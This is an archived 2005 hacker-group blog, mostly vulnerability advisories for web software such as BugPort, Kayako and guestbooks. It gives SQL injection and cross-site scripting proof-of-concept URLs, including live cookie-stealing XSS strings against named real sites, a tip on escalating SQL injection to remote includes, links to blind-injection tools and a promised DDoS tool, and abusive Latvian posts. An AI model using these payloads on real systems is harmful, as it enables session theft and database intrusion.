by r0t,der4444,cembo,VietMafia

Saturday, December 31, 2005

BugPort Multiple vuln.

BugPort Multiple vuln.


r0t last vuln. report/advisory in 2005 year!

Vuln. discovered by : r0t
Date: 31 dec. 2005
vendor:www.incogen.com/index.php?type=General¶m=bugport
affected version:v1.147 and prior

Product Description:

The BugPort system is an open-source, freely available, web-based system to manage tasks and defects throughout the software development process. BugPort is written with the PHP language using its object-oriented capabilities and is in use by INCOGEN for internal management of software development and QA.


Vuln. Description:

1.
BugPort contains a flaw that allows a remote sql injection attacks.Input passed to the "orderBy" "where" "devWherePair[1][0]" parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


/index.php?view=DevelopmentItemResultsView&devWherePair
%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubjec
t%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F
++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=[SQL]


/index.php?view=DevelopmentItemResultsView&where=project
_id+%3D+%3F&orderBy=[SQL]

/index.php?view=DevelopmentItemResultsView&where=[SQL]




2.
BugPort contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to multiple paremters(see POC below) in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/index.php?view=AddToFavoriteItemSetView&ids%5B0%5D=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_id
=9&action=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_
id=[XSS]

/index.php?view=DevelopmentItemResultsView&devWherePair
%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csub
ject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST
+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D
=240&devWherePair%5B1%5D%5B1%5D=[XSS]


/index.php?view=DevelopmentItemResultsView&where=project
_id+%3D+%3F&orderBy=priority_id+DESC&binds%5B0%5D=[XSS]



3.

Input passed to the "action" paramter isn't properly sanitised before being returned to the user. which may expose sensitive information about the system configuration and full instalisations path.


/index.php?view=AddRelatedDevelopmentItemFormView&report_id
=9&action=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.

Pridela statistika

Gada pedeja diena ieskatoties skaititajos ieksh counter.hackers.lv , mes redzam ka neapshaubams liideris ne tikai peedjos meneshos ir bijis shis blogs.

Sheit ir peedeja meeneshu statistika:

pridels rulles


Nepiekriteji var teikt ka kaads ir mesls un ka blogs ir suuds, bet paarspej kaut vai tikai apmekletibas zinja daudzus popularus pasakumus, neapshaubmi esot par latvijas apmekleto blogu!

Katra zinja shii bloga apmekletaji liekoties ir droshiibas specialisti arpus latvijas ,katra zinja ja pat blogs riitdien mirs tad veel visu nakamo gadu cilveki runas par to.Tas tik apliecina ka savu esam panaakushi un ka arii shim visam buus turpinajums , dienas paradisies forums varbuut nieciigs saits ...bet pats galvenais ka visa atmosfera kas valdija sheit arii paliks, kaut peedeja laika esat pamanijushi ka parvertas vairak par bugtraqu nevis normalu blogu, bet tas viss piederejas pie lietas, taadu strateegiju ne stillu mees izveljamies, kameer nebuus atapaklaj foruma tikmer es publiceeshu kaut vai vismaz ievainojamibas no dazhadiem pasaakumiem.

r0t ievainojamibas:

Par ievainojamibam , daudzas no manis publiceetam ievainojamibam skara scriptus kuri nekad nebija bijushi bugtraqos vispar un nebuutu vispar bijushi, jo nekadi demo nekadi downloadi parastiem mirstigiem kuri neshkkirsies no sumamm virs 50,000 vai pat 100,000$ nebija iespejami.
Un ja pat man izdevas vinjos tikai atrast kaut kadus elemterus XSS bagus, to nevareja izdariit neviens pirms manis.
Teiksat kas tad tur taads, ok... piesedies pie bankas saita un redzeism cik viegli tev meklesies ievainojamiibas kaut vai XSS.
Te atksaneja no gudriniekiem ka tas ir fufelis, ko es daru, tik nez kapeec 3 no popularakiejiem vuln scanneru developeriem griezas pie manis peec padomiem?
Varesi izdaritt labak par mani nopirkshu saldejumu, nesvaidies ar vardiem ja neko nevari pats!

Pateikshu prieksha saits jaunais un forums buus atrodams zem domena r00t.it!

tapat pateikshu prieksha ka DDOS toolis Alberts iznaks kaut kad janvari, tad kad cembo buus vairak laika un veleshanas!

Friday, December 30, 2005

Veltiits visam piizdam

Shodien atkal pamaniju ka redz kadam kaut kas sheit nepatiik , redz kad agrak blogs bij veel lasams , esmu losis es neko nevaru utt. un lai labak pastastu par kardingu.

Tapec sho postu veltiishu visam latviski runajosham piizdam , kuram niez un uz vietas sava kakta nevar normali noseedeet.
Seezhat sava datuve vai taisat augsha jaunu hackers lv un tupat tur , sheit neviens jums nespiezh neko lasiit un nakt uz shejieni.
Un shini gadijuma konkreti: loh ja tavas zinashanas kaut vai butu videja liimeni tad vispar sheit neliistu un nesmirdeetu, tu vari kaut ko paarmest puisheljiem ar kuriem kopa baksties pa kaktiem .
Vajag tev warezu ej uz hack.nite ruupejies pa droshiibu ej uz netsec , ko tu sheit mekle, halvu ? Da pasuuka sev pimpi buus tev halva.
Ja atnaci te paradit cik esi kruts , tad droshi vari izvelties citu vietu kur smirdet,a ja esi tik speejigs piirags tad njem un izdzes shito blogu... Un es vel tev par to saldejumu uzsaukshu.
Un par kardingu, man nekada sakara ar to nav ... prieksh kardinga ir speciali forumi un tur tev vai jums ari pastastis pa kardingu.
Tapeec kad nakamo reizi ienaks galva ideja paspiidet ar savu gudriibu , no saakuma pasuka sev tad padoma vai tiesham esi tik kruts lai te kaut ko kaadam paarmestu.

PS. jau ieprieksh saku visiem tiem punisheriem kas tagad peekshnji iedomasies ka tadi redz vinji buus un siiko r0t paarmacis par vinja atbildi uz vinju smirdeeshanu, to ka juus visi esat meesli. Un peec respekta no juus pusi netiecos , shis ir manas majas un ja kaads nak un spljaudities sheit tad sanjem to pashu atpakalj.
Un viss kas sheit tiek dariits netiek darits prieksh sevis , bet prieksh cilvekiem kam tas ir vajadziigs un nekas nemainiisies delj paris neatiistitiem idnividiem.
Necienisat mani necienishu juus, splausat sheit spljaushu juma seja...
Seezhat sava lokalaja tiikla un tirinaties talak , jums sheit nav ko dariit shis ir pivat blogs!

+
Gudriniekie , lielie net owneri , da juus kadreiz izsakot savu viedokli sanjematies drosmi , lai nav man vienmer jaruna ar anonimiem mesliem!


ja kadam slikti daleca varu ari atkartoties!

r0t

Kayako SupportSuite multiple vuln.

Kayako SupportSuite multiple vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.kayako.com/supportsuite.php
affected version: v3.00.26 and prior

Product Description:

Kayako SupportSuite offers true integrated Multi-Channel solution allowing you to manage your emails, online issues, chats, self service and issues received by phone. The entire system has been designed to improve productivity and provide seamless integration between all the available modules. With rich AJAX based interface and unmatched features like IRS, VoIP, ViewShare you can be assured that your client issues are not only handled in a timely but efficient manner.


Vuln. Description:

Kayako SupportSuite contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "nav" paremter in "index.php" and field "Full Name","Email" "Subject" "Registered Email" paramters in "regsiter" "submit" "lostpassword" modules isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


POC:


/index.php?_m=downloads&_a=view&
parentcategoryid=3&pcid=1&nav=[XSS]


FOR POC Manulally enter:
''[XSS]

in

/index.php?_m=core&_a=register

Full Name:
Email:

/index.php?_m=tickets&_a=submit

Full Name:
Email:
Subject:

/index.php?_m=core&_a=lostpassword

Registered Email:


+

Attacker can view full install. path ,this flaw exists cauz input to "_a","newsid","downloaditemid","kbarticleid" parameters isn't properly sanitised before being returned to the user.

/index.php?_m=news&_a=[FULL PATH]

/index.php?_m=news&_a=viewnews&newsid=[FULL PATH]

/index.php?_m=downloads&_a=downloadfile&downloa
ditemid=[FULL PATH]

/index.php?_m=knowledgebase&_a=viewarticle&kbart
icleid=[FULL PATH]

Solution:
Edit the source code to ensure that input is properly sanitised.

22C3: Private Investigations by r0t



Today @ 22C3 private investigations or eu. hackers conference meet some my old friends, "The Cracker" and other "-??-" both i know from crackers scene. -??- was sitting in da one of corner with his box and was showed that he is very busy as always:) The Cracker told that he is out from cracking and try to legalize his life...
Thats the nice stuff...
There was and will be today some good lectures , but...if many of them are unintresant for me like gsm,xbox or terorosim stuff..
About anonymity, there was JAP,etc..
I dont think that in meetings like this one must speak about projects like JAP.
speakers was ok... In da dark room was alltime some overlockers ...i will never understand why shoud give so much time to overlock door key lock or nike key lock...
There was alot of .net junkies... like a paradise for them.. 24 hours at day chillin with they boxes:)
Bonnus stuff , there was stand for someone who offer ssl stuff, they gaved ssl certificates for free..isnt amazing? ... yeah... i dont think that is a some bonnus..
In one area there was some books about liquid life and communism ,nazis,marijuna,lsd and other crazy things...(i suppose to give that area undergound meaning)
Ok. too much critic for organization, but anyway i had my fun there ...learned?
No, just saw some other views and ways to solve problems and to get sucess.
Today is last day and i will not go there but if you are in berlin you can take view.

about my english.. i think you already know.

iPei Guestbook XSS vuln.

iPei Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.epistream.com/ipei/
affected version:v1.7 and prior

Product Description:

iPei is a simple but elegant little guestbook. The interface is OS X gui-ish, and it comes with mundane features like pass word protection, IP view, entry pruning, commenting, Y! smilies, secure posting, and owners may customize some aspects of displays.


Vuln. Description:

iPei Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to email field paremters in "/index.php?a=sign" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

OoApp Guestbook XSS vuln.

OoApp Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.ooapp.com/
affected version:2.1 and prior

Product Description:

This is a free php based guestbook for your web site. Easy to setup, no MySQL necessary. Uses a basic flat file. Includes managment area, and general area where users can sign the guestbook. This version corrects a problem that came up when someone did not enter their email address into the guestbook.

Vuln. Description:

OoApp Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "page" paremter in "home.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:


/home.php?page=1[XSS]
or
/home.php?do=add_form&page=1[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

AdesGuestbook XSS vuln.

AdesGuestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:www.adesdesign.net/php/products_adesguestbook.php
affected version:v2.0 and prior


Product Description:

This is a Guestbook which works with PHP and MySql. Admin Page is a secure page that can be logged in only by admininstrator and includes functions such as deleting the record and modifying the record. Records can be deleted/modified by ID, Email and Date. It is developed with the customization in mind, so you can easily change the look of the AdesGuestbook according to your website. It uses one single CSS file for the table colors and text format. By changing this CSS file you can apply your choice of colors easily to the whole Guestbook.

Vuln. Description:

AdesGuestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "totalRows_rsRead" paremter in "read.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:


/read.php?pageNum_rsRead=1&totalRows_rsRead=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Wednesday, December 28, 2005

Happy New Year !!!

Me and crew wish a happy new year to everyone!

----------------------------------------------------

last days in 2005 , r0t will be on european hackers conference, so here will be no vuln. or security reports from r0t at last days...So, take a break!:)

Other guys will enjoy they holydays around the globe and with family...

New vuln,advisories,board on 2006 year!


With best wishes r0t,der4444,RaZbh,cembo!!!

Tuesday, December 27, 2005

Sql Injection, take complete advantage

Security/Hack Tip:
If a script stores path information in a DB and that information is later used in include statements; with an sql injection this can lead to remote includes. Obvious, but could be easily overlooked. I just wanted to add that after watching the last video that was posted here.

Php writers: Dont store paths in a DB.

Hackers: If you find a sql injection, check if the script does this.

Sunday, December 25, 2005

Blind MySQL injection database stressing tool

Hi..

Seems someone wins a fight against a blind MySQL injection, with mysql
v3 and magic_quotes enabled.. This is the funny video:
http://www.reversing.org/files/beyond_mysql_injection.avi

ed2k://|file|beyond_mysql_injection.avi|18148274
|CD388D581A720AF5C5887117D9279A1A|h=UZFXHKMLGBOB
P56FAYF2LLFNSQARNKQW|/

There's also another video here:
http://www.unsec.net/download/bsqlbf.avi

The Magic is in the ending part of the video!

The tool ("sqlbftools") is under the "projects" section and a little
article ("Blind MySQL injection and database stressing") is under the
"essays" section in the page: http://www.reversing.org. The msqlbf perl
script is available at http://www.unsec.net/


Ping!


Grettings to Dsr! and 7a69


PD: Dab told me to say nothing about http://unsec.net


--
kanutron (aka Josepmaria Roca)
* mailinglists at kanutron.net
* http://kanutron.net/
---------------------------------------------------------
" las opiniones son como los culos,
todo el mundo tiene el suyo "
- Harry Challahan -

Friday, December 23, 2005

CommonSpot Content Server vuln.

CommonSpot Content Server vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.paperthin.com/
affected version:4.5 and prior


Product Description:

PaperThin's award-winning technology enables our customers to meet their business objectives. With CommonSpot Content Server, organizations can quickly build and easily maintain dynamic, personalized and sophisticated sites.
CommonSpot scales to meet the Web publishing and content management needs of the most demanding sites, and is used by more than 200 organizations of all sizes worldwide.


Vuln. Description:

CommonSpot Content Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "NewWindow" paremter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

poc:

XSS:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email
-login-info.cfm&errmsg=No%20user%20account
%20was%20found%20for%20that%20email%20addr
ess.%20%20Please%20try%20again.&bNewWindo
w=[XSS]

full path:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email
-login-info.cfm&errmsg=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.

Communiqué 4 XSS vuln.

Communiqué 4 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.day.com/site/en/index.html
affected version: 4 and prior

Product Description:

Communiqué 4 is the first native JCR (JSR 170) standard compliant enterprise content management solution available on the market today. Communiqué 4 revolutionizes content management by decoupling the content management application from the underlying repository.
Communiqué 4 offers a comprehensive range of fully integrated content solutions that enables leading companies to address all of their global content challenges with one highly scalable, reliable platform.

Vuln. Description:

Input passed to the "query" parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Solution:
Edit the source code to ensure that input is properly sanitised.

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.fatwire.com/
affected version:6.2 and prior


Product Description:

UpdateEngine6 is a dynamic content management (DCM) solution to address some of the challenges facing enterprise-class e-business initiatives. Storing content at the field level in the database, allowing for the management of that content through an Web interface, exposing that content to innumerable uses, and publishing static Web pages and dynamic content form the basis of the UpdateEngine6 dCM solution. It enables business users to manage content, shortens installation and implementation time, provides a rich set of Web-based tools and wizards, and easily integrates with legacy systems. Since it is 100% Java, it can integrate with all major application servers, including IBM, BEA, Sun, Oracle and HP, and with all databases. Under an agreement made on May 1, 2002, FatWire's UpdateEngine announced that it will licensed Autonomy's advanced technology for its flagship product, UpdateEngine, to deliver a fully integrated categorization and retrieval solution into its content management software.

Vuln. Description:

UpdateEngine contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "FUELAP_TEMPLATENAME" "EMAIL" "COUNTRYNAME" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


poc:

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID
=FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D
66&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1404733&COUNT
RY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5
F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5FPAGE%5F1
415379&FUELAP_TEMPLATENAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_
TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_
ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402
412&EMAIL=[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COU
NTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID
=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELA
P_SITEDBID=SITE%5F%2D66&

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
MPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=
FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&
EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=IN
TSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHIT
EPAPERS%5F1300483&COUNTRYNAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
MPLATENAME=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

eggblog vuln.

eggblog vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:www.epicdesigns.co.uk/projects/eggblog.php
affected version:eggblog v2.0 and prior


Product Description:

eggblog is a small, simple, secure and open source blogging package. Anyone with a php and mysql enabled server can make use of our easy to install package to create their own personal blog.


Vuln. Description:


1.
eggblog contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameters in "home/search.php" and when performing a search isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

2.
It is also possible to disclose the full path to "search.php" by accessing it with an invalid "q" parameter.


Solution:
Edit the source code to ensure that input is properly sanitised.

AlstraSoft EPay Enterprise v3.0 XSS vuln.

AlstraSoft EPay Enterprise v3.0 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.alstrasoft.com/epay_enterprise.htm
affected version:v3.0 and prior

Product Description:

EPay Enterprise (formally known as DoPays) has been acquired by AlstraSoft and added into our product line with the growing demand for online payment processing business similar to Paypal and Stormpay.com. The most advance and comprehensive version of our EPay series and in the market at the moment, our Enterprise edition not only allows you to start your own payment processor site EPay operators can also offer escrow services with our built in EZ-Escrow module which is great for auction or freelance websites.
EPay Enterprise is the ideal software solution for those who wish to run their own Paypal, Stormpay, or e-gold type of online business. Epay Enterprise comes with a ready out of the box website with all the features you need to run your own payment gateway system at a low price of only $300.


Vuln. Description:

EPay Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to paremters in many fields (see below) isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/enterprise/members/profile.htm
/enterprise/members/card.htm
/enterprise/members/bank.htm
/enterprise/members/subscriptions.htm
/enterprise/members/send.htm
/enterprise/members/request.htm
/enterprise/members/forgot.htm
/enterprise/members/escrow.htm
/enterprise/members/donations.htm
/enterprise/members/products.htm

Solution:
Edit the source code to ensure that input is properly sanitised.

Thursday, December 22, 2005

SECURITY.UZ :)

I always loved those guys who say that they are sec. specialist and here is one simple example, that not everyone who call themselfs "security specialist" are real sec. specilists.
Before to learn others, try to educate yourself more, everyone from us can have mistakes cauz we are humans, but if you call yourself as security specialist then check your own security first.

http://www.security.uz/search/default.asp?q=
%22%3E%3Cscript%3Ealert%28%27r0t%20loves%20sec
urity%20guys%20who%20are%20not%20secure%20by%
20themselfes%27%29%3C%2Fscript%3E&only=bugtraq



PS. your site can have more buqs i checked only simplest.

Yahoo! vuln.

POC:
http://de.mf.news.yahoo.com/mailto?url=
http://attackerhost.com/badscript&title
=[ATTACKER NICE TEXT TO TARGET]

ii


  • CHECK LIVE EXAMPLE
  • download.com XSS vuln.

    download.com have flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "tg" "path" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    http://www.download.com/3120-20_4-0.html?
    tag=srch&qt=r0t&tg=[XSS]

    http://music.download.com/1300-1_32-142.
    html?tag=mhd_su&path=[XSS]

    mp3.com XSS vuln.

    in da simplest place:)


    mp3.com have flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "query" paremter in "search.php" isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    live POC:
    http://www.mp3.com/search.php?action=Search
    &stype=artist&query=%3Cscript%3Ealert
    (document.cookie)%3C/script%3E&x=31&y=16

    WebDB SQL inj vuln.

    WebDB SQL inj vuln.

    Vuln. discovered by : r0t
    Date: 22 dec. 2005
    vendor:http://www.loissoftware.com
    affected version:1.1 and prior

    Product Description:
    WebDB is the totally generic, instant online database system - It is possible to create a dynamic web site with no programming knowledge. The software comes with an administration system that allows you to create fields, records, etc. and then decide which fields will appear on the search, results and details pages. You also have total control of the look and feel of the database pages.


    Vuln. Description:

    WebDB contains a flaw that allows a remote sql injection attacks.Input passed to the search parameter in search module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    WAXTRAPP XSS vuln.

    WAXTRAPP XSS vuln.

    Vuln. discovered by : r0t
    Date: 22 dec. 2005
    vendor:http://www.waxtrapp.com
    affected version:3.0.x already tested on 3.0.1 and previous versions.

    Product Description:

    WAXTRAPP is a development platform for fully personalized content distribution, content management, enterprise information portals and online information systems. WAXTRAPP is active since 1997 as a leading innovator in the internet software industry. With customers like TV networks, industry, e-government and healthcare WAXTRAPP has proven to be the most scalable and flexible system around and easily integrates with a wide range of external systems. The number one reason people choose WAXTRAPP is because it brings together inter- intra- extranet functionality with fully personalized portal functionality, where otherwise such projects would require the purchase of many different software products and expensive IT-projects to let them work together. This enables mid-sized companies to implement cost-saving solutions otherwise only affordable for multinationals.

    Vuln. Description:

    WAXTRAPP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    WANDSOFT e-SEARCH XSS vuln.

    WANDSOFT e-SEARCH XSS vuln.

    Vuln. discovered by : r0t
    Date: 22 dec. 2005
    vendor:http://www.wandsoft.com/products/
    affected version:latest and its also used as search module for WANDSOFT e-Suite 4 and prior.

    Product Description:

    The WANDSOFT e-SEARCH function allows the content of your website, extranet or intranet to be indexed, so users can find a specific word or topic without having to browse the entire site. Any changes to the site content are automatically updated in the site index, so that WANDSOFT e-SEARCH will always include the latest information in the search results.

    The WANDSOFT e-SEARCH functionality enables you to provide better customer care and to reduce the possible frustration of your website visitors – even novice users will be able to locate and go directly to the area they seek immediately.

    Why Use WANDSOFT e-SEARCH?

    As well as the benefits of using any WANDSOFT e-Suite module, the particular benefits of using WANDSOFT e-SEARCH are:

    - Your customers will be delighted to quickly locate the information or page they seek
    - Website visitors will remember a positive experience, reflecting well on your organisation
    - No training is required; once installed, the WANDSOFT e-SEARCH functionality is automatic


    Vuln. Description:

    The WANDSOFT e-SEARCH contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Wednesday, December 21, 2005

    Prieciigus ziemassveetkus!

    Noveeleshu visiem prieciigus ziemasveetkus ari manu kaujas biedru vaarda!
    Piedzeraties kaartiigi izsitiet visus logus kaiminjiem, utt. tada gara...
    Bet ja nopietni tad tiesham prieciigus ziemsvvetkus veelu visiem.

    ak jaa, dargie datuvieshi "topic" paremetru palabojat, a to mazie juus veel taa kadu dienu nonesiis.

    Vsjo, visi tagad atpuusties!!!

    Text-e XSS vuln.

    Text-e XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.text-e.com/
    affected version:1.6.4 and prior

    Product Description:

    Text-e CMS is a full featured Content management solution which dramatically reduces the cost and the complexity associated with creating content rich such as portals,collaborative applications,CRM and others.

    Vuln. Description:

    Text-e CMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Tangora™ Portal CMS XSS vuln.

    Tangora™ Portal CMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.tangora.com/
    affected version:4.0 and prior

    Product Description:

    Tangora™ Portal CMS makes it easy for small and mid-sized companies and organizations to communicate via web.

    All in one solution
    Tangora Portal CMS is modular standard software that enable you to create and manage a wide range of websites on one platform, using one tool.

    Tangora Portal CMS not only gives you the tools to manage practically any number of websites, it is web content management, portal management, application server, integration tools, and usage statistics in one advanced, but easy-to-use, package.




    Vuln. Description:

    SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "action" paremter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


    example:

    /page1631.aspx?action=[XSS]
    /page496.aspx?action=[XSS]


    note:For testing , page number is credited to search function.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SyntaxCMS XSS vuln.

    SyntaxCMS XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.syntaxcms.org/
    affected version:1.2.1 and prior

    Product Description:

    SyntaxCMS simplifies publishing various types of content to a site, facilitates creating and managing arbitrary relationships among content items, automates and accelerates custom development, and encourages reuse of site components with other SyntaxCMS installations. It is built using PHP and MySQL and is licensed under the Common Public License.


    Vuln. Description:

    SiteSage contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "search_query" paremter isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    example:

    /search/?search_query=[XSS]

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SpireMedia CMS SQL inj. vuln.

    SpireMedia CMS SQL inj. vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.spiremedia.com/
    affected version:mx7


    Product Description:

    The SpireMedia CMS is an enterprise class Content Management System for managing Websites, Intranets, and Extranets. It runs under the ColdFusion application server and is platform neutral. The system is component-based, allowing objects properties to be extended via custom components and provides support for many applications such as message boards, calendaring, tech tips, user contributed content, etc. The SpireMedia CMS is currently deployed for such companies as Steamboat Ski and Resort, United Agri Products, GE Johnson Contruction, Rocky Mountain Clothing Company, Qwest Incredible Internet, and many others.

    Vuln. Description:

    SpireMedia CMS contains a flaw that allows a remote sql injection attacks.Input passed to the "cid" parameter in "index.cfm" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SPIP XSS vuln.

    SPIP XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.spip.net/en
    affected version:1.8.2 and prior

    Product Description:

    SPIP is a publishing system developed by the minirézo to manage the site uZine. We provide it to anyone as a free software under GPL license. Therefore, you can use it freely for your own site, be it personnal, co-operative, institutional or commercial.

    Vuln. Description:

    SPIP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to paremters in "spip_login.php3" "spip_pass.php3" fields isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    Speartek XSS vuln.

    Speartek XSS vuln.

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vendor:http://www.speartek.com
    affected version:6.0 and prior


    Product Description:

    SpearTek's advanced solutions help you optimize the Internet channel to fuel ongoing business success. Our technology enables companies to leverage a single platform to manage content, email marketing and ecommerce applications, easily and cost-effectively. Whether you are a multi-million dollar enterprise or a start-up venture, our solutions advance your business objectives by delivering real return on investment while enhancing the customer experience.


    Vuln. Description:

    SpearTek contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to search module paremters isn't properly sanitised before being returned to the user.
    This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

    Solution:
    Edit the source code to ensure that input is properly sanitised.

    SiteSage XSS vuln

    SiteSage XSS vuln

    Vuln. discovered by : r0t
    Date: 21 dec. 2005
    vednor:http://www.starphire.com/
    affected version:5.0.18 and prior,SiteSage-EE,SiteSage-SE,SiteSage-SB,SiteSage-LE

    Product Description:

